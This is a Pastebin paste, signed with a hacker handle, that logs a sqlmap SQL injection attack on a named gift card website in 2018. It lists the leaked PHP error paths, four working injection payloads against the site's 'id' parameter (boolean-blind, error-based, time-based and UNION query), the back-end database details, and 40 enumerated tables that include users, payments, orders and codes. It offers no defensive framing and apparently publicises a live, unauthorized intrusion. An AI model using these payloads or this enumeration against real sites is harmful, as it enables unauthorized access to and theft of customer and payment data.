Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ---------------------------------------------------------------------------------------------------------------------------------------- Checked_By_The_D4RK☆DR4G0N | ☆☆☆Hell Wolf Security Professional -
- ---------------------------------------------------------------------------------------------------------------------------------------
- ☆ Target: http://worldofgiftcard.com/categories_list.php?id=17
- ☆ Errors:
- Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in /home/content/00/11156600/html/categories_list.php on line 5
- ☆ Tested: 30/07/2018
- Warning: mysqli_num_rows() expects parameter 1 to be mysqli_result, boolean given in /home/content/00/11156600/html/categories_list.php on line 6
- sqlmap identified the following injection point(s) with a total of 126 HTTP(s) requests:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=17' AND 3483=3483 AND 'WXVE'='WXVE
- Type: error-based
- Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- Payload: id=17' AND ROW(4489,1850)>(SELECT COUNT(*),CONCAT(0x717a6b6a71,(SELECT (ELT(4489=4489,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM (SELECT 6083 UNION SELECT 7187 UNION SELECT 3924 UNION SELECT 1971)a GROUP BY x) AND 'nWVt'='nWVt
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id=17' AND SLEEP(5) AND 'iWmq'='iWmq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 7 columns
- Payload: id=17' UNION ALL SELECT NULL,CONCAT(0x717a6b6a71,0x5949427258766e71774e53636562444b494f55726e5a64557248496f676e62716a5076524c6c6a55,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: Apache
- back-end DBMS: MySQL >= 4.1
- available databases [2]:
- [*] BDGIFTCARD
- [*] INFORMATION_SCHEMA
- Database: BDGIFTCARD
- [40 tables]
- +---------------------------------------------------------------+
- | BDGIFTCARDRMFOCLARTICULOS |
- | BDGIFTCARDRMFOCLCART |
- | BDGIFTCARDRMFOCLCATEGORIES |
- | BDGIFTCARDRMFOCLCODES |
- | BDGIFTCARDRMFOCLCURRENCY |
- | BDGIFTCARDRMFOCLDEVELOPERS |
- | BDGIFTCARDRMFOCLLINKS |
- | BDGIFTCARDRMFOCLORDERS |
- | BDGIFTCARDRMFOCLPAYMENTS |
- | BDGIFTCARDRMFOCLPLATFORMS |
- | BDGIFTCARDRMFOCLPRICES |
- | BDGIFTCARDRMFOCLQUESTIONS |
- | BDGIFTCARDRMFOCLRATINGS |
- | BDGIFTCARDRMFOCLREGIONS |
- | BDGIFTCARDRMFOCLUSERS |
- | INFORMATION_SCHEMARMFOCLCHARACTER_SETS |
- | INFORMATION_SCHEMARMFOCLCLIENT_STATISTICS |
- | INFORMATION_SCHEMARMFOCLCOLLATIONS |
- | INFORMATION_SCHEMARMFOCLCOLLATION_CHARACTER_SET_APPLICABILITY |
- | INFORMATION_SCHEMARMFOCLCOLUMNS |
- | INFORMATION_SCHEMARMFOCLCOLUMN_PRIVILEGES |
- | INFORMATION_SCHEMARMFOCLINDEX_STATISTICS |
- | INFORMATION_SCHEMARMFOCLINNODB_BUFFER_POOL_CONTENT |
- | INFORMATION_SCHEMARMFOCLINNODB_IO_PATTERN |
- | INFORMATION_SCHEMARMFOCLINNODB_RSEG |
- | INFORMATION_SCHEMARMFOCLKEY_COLUMN_USAGE |
- | INFORMATION_SCHEMARMFOCLPROCESSLIST |
- | INFORMATION_SCHEMARMFOCLPROFILING |
- | INFORMATION_SCHEMARMFOCLROUTINES |
- | INFORMATION_SCHEMARMFOCLSCHEMATA |
- | INFORMATION_SCHEMARMFOCLSCHEMA_PRIVILEGES |
- | INFORMATION_SCHEMARMFOCLSTATISTICS |
- | INFORMATION_SCHEMARMFOCLTABLES |
- | INFORMATION_SCHEMARMFOCLTABLE_CONSTRAINTS |
- | INFORMATION_SCHEMARMFOCLTABLE_PRIVILEGES |
- | INFORMATION_SCHEMARMFOCLTABLE_STATISTICS |
- | INFORMATION_SCHEMARMFOCLTRIGGERS |
- | INFORMATION_SCHEMARMFOCLUSER_PRIVILEGES |
- | INFORMATION_SCHEMARMFOCLUSER_STATISTICS |
- | INFORMATION_SCHEMARMFOCLVIEWS |
- +---------------------------------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
